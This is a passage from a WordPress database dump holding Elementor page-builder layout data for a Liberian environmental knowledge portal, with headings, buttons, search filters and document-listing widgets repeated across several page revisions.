center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}],\"reverse_order_tablet\":\"reverse-tablet\",\"reverse_order_mobile\":\"reverse-mobile\",\"hide_mobile\":\"hidden-phone\"},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\"}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"339607e\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_terms\":\"yes\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.75)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_bg_color\":\"#6ec1e4\",\"show_author\":\"\",\"show_comments\":\"\",\"arrows\":\"\",\"autoplay\":\"\",\"infinite\":\"\",\"meta_title_related_position\":\"after\",\"meta_content_related_position\":\"after\",\"title_color_hover\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/news-and-blogs\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(28308,4080,'_elementor_version','3.4.0'),(28309,4080,'_elementor_template_type','wp-page'),(28310,4080,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(28312,4080,'_elementor_pro_version','3.3.6'),(28316,4081,'_elementor_edit_mode','builder'),(28317,4081,'_elementor_template_type','wp-page'),(28318,4081,'_elementor_version','3.4.0'),(28319,4081,'_wp_page_template','default'),(28320,4081,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"20\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.81400000000000005684341886080801486968994140625},\"elements\":[{\"id\":\"50df923\",\"elType\":\"widget\",\"settings\":{\"filter_id\":\"4062\",\"content_provider\":\"epro-posts\",\"apply_type\":\"ajax-ontyping\",\"typing_min_letters_count\":5,\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[]},\"elements\":[],\"widgetType\":\"jet-smart-filters-search\"}],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.186000000000007048583938740193843841552734375},\"elements\":[{\"id\":\"1010816\",\"elType\":\"widget\",\"settings\":{\"filter_id\":[\"4063\"],\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"filters_position\":\"inline-block\",\"filters_space_between_horizontal\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"checkbox_border_border\":\"solid\",\"checkbox_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"checkbox_border_color\":\"#00AA33\",\"checkbox_border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\",\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(28322,4081,'_elementor_pro_version','3.3.6'),(28324,4082,'_elementor_edit_mode','builder'),(28325,4082,'_elementor_template_type','wp-page'),(28326,4082,'_elementor_version','3.4.0'),(28327,4082,'_wp_page_template','default'),(28328,4082,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"20\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.81400000000000005684341886080801486968994140625},\"elements\":[{\"id\":\"50df923\",\"elType\":\"widget\",\"settings\":{\"filter_id\":\"4062\",\"content_provider\":\"epro-posts\",\"apply_type\":\"ajax-ontyping\",\"typing_min_letters_count\":5,\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[]},\"elements\":[],\"widgetType\":\"jet-smart-filters-search\"}],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.186000000000007048583938740193843841552734375},\"elements\":[{\"id\":\"1010816\",\"elType\":\"widget\",\"settings\":{\"filter_id\":[\"4063\"],\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"filters_position\":\"inline-block\",\"filters_space_between_horizontal\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"checkbox_border_border\":\"solid\",\"checkbox_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"checkbox_border_color\":\"#00AA33\",\"checkbox_border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\",\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(28330,4082,'_elementor_pro_version','3.3.6'),(28332,4083,'_elementor_edit_mode','builder'),(28333,4083,'_elementor_template_type','wp-page'),(28334,4083,'_elementor_version','3.4.0'),(28335,4083,'_wp_page_template','default'),(28336,4083,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e994a25\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"20\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"9e95f9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.81400000000000005684341886080801486968994140625},\"elements\":[{\"id\":\"24db2ea\",\"elType\":\"widget\",\"settings\":{\"filter_id\":\"4062\",\"content_provider\":\"epro-posts\",\"apply_type\":\"ajax-ontyping\",\"typing_min_letters_count\":5,\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[]},\"elements\":[],\"widgetType\":\"jet-smart-filters-search\"}],\"isInner\":true},{\"id\":\"82d0a07\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.186000000000007048583938740193843841552734375},\"elements\":[{\"id\":\"711091a\",\"elType\":\"widget\",\"settings\":{\"filter_id\":[\"4063\"],\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[{\"_id\":\"1ec2978\"}],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"filters_position\":\"inline-block\",\"filters_space_between_horizontal\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"checkbox_border_border\":\"solid\",\"checkbox_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"checkbox_border_color\":\"#00AA33\",\"checkbox_border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"show_label\":\"yes\",\"additional_providers_enabled\":\"\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\",\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(28338,4083,'_elementor_pro_version','3.3.6'),(28341,4084,'_elementor_edit_mode','builder'),(28342,4084,'_elementor_template_type','wp-page'),(28343,4084,'_elementor_version','3.4.0'),(28344,4084,'_wp_page_template','default'),(28345,4084,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e994a25\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"20\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"9e95f9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.81400000000000005684341886080801486968994140625},\"elements\":[{\"id\":\"24db2ea\",\"elType\":\"widget\",\"settings\":{\"filter_id\":\"4062\",\"content_provider\":\"epro-posts\",\"apply_type\":\"ajax-ontyping\",\"typing_min_letters_count\":5,\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[]},\"elements\":[],\"widgetType\":\"jet-smart-filters-search\"}],\"isInner\":true},{\"id\":\"82d0a07\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.186000000000007048583938740193843841552734375},\"elements\":[{\"id\":\"711091a\",\"elType\":\"widget\",\"settings\":{\"filter_id\":[\"4063\"],\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[{\"_id\":\"1ec2978\"}],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"filters_position\":\"inline-block\",\"filters_space_between_horizontal\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"checkbox_border_border\":\"solid\",\"checkbox_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"checkbox_border_color\":\"#00AA33\",\"checkbox_border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"show_label\":\"yes\",\"additional_providers_enabled\":\"\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More 